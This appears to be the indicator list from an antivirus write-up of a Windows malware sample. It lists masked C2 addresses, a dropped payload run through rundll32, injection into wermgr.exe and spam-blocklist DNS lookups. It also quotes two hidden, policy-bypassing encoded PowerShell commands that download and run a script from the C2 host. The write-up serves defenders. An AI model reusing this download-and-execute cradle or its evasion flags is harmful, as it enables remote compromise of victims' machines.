Technical Information
- http://46.#.19.161/point.php
- <SYSTEM32>\wermgr.exe
- %WINDIR%\syswow64\cmd.exe
- %TEMP%\pgsv.bin
- '46.#.19.161':80
- '91.##4.254.152':80
- '18#.#4.99.214':443
- 'ap#.#pify.org':80
- DNS ASK ap#.#pify.org
- DNS ASK 19#.###.#11.95.zen.spamhaus.org
- DNS ASK 19#.###.#11.95.cbl.abuseat.org
- DNS ASK 19#.###.###.95.b.barracudacentral.org
- '<SYSTEM32>\cmd.exe' /c poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8ANAA2...' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8ANAA2...
- '<SYSTEM32>\rundll32.exe' %TEMP%\PGsv.bin StartW
- '<SYSTEM32>\wermgr.exe'